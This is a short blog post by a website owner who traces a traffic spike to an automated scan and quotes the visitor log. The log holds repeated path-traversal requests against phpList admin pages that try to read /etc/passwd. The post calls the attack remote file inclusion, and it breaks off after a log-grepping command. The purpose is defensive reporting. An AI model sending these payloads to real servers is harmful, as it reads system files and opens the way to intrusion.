Exponentially increased traffic?

So I logged in to my site today and noticed my traffic had spiked exponentially! Check out the screenshot of the bar graph (showing yesterday and today for comparison). 300 visitors and 3000 pageviews in a single day? On my humble little website? Way too good to be true!

So I looked further and found some unsettling info in the visitor statistics… It looked something like this:

14:38:08 //lists/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd 14:38:09 //newsletter/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd 14:38:10 //news/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd 14:38:10 //phplist/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd 14:38:11 //phpList/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd 14:38:12 //admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd 14:38:13 //phplist/lsts/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd 14:38:14 //phplists/admin/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd 14:38:14 //list/index.php?_SERVER[ConfigFile]=../../../../../../../../../../../../../../../../../../../../../../../etc/passwd

Looks like someone was trying to pull a RFI — Remote File Inclusion — attack on my site…

Next I checked my logs:

cat /var/www/logs/*.log | grep '\.\.\/\.\.\/' > /tmp/rfi_attack.log cat /var/www/logs/*.log

Continue reading →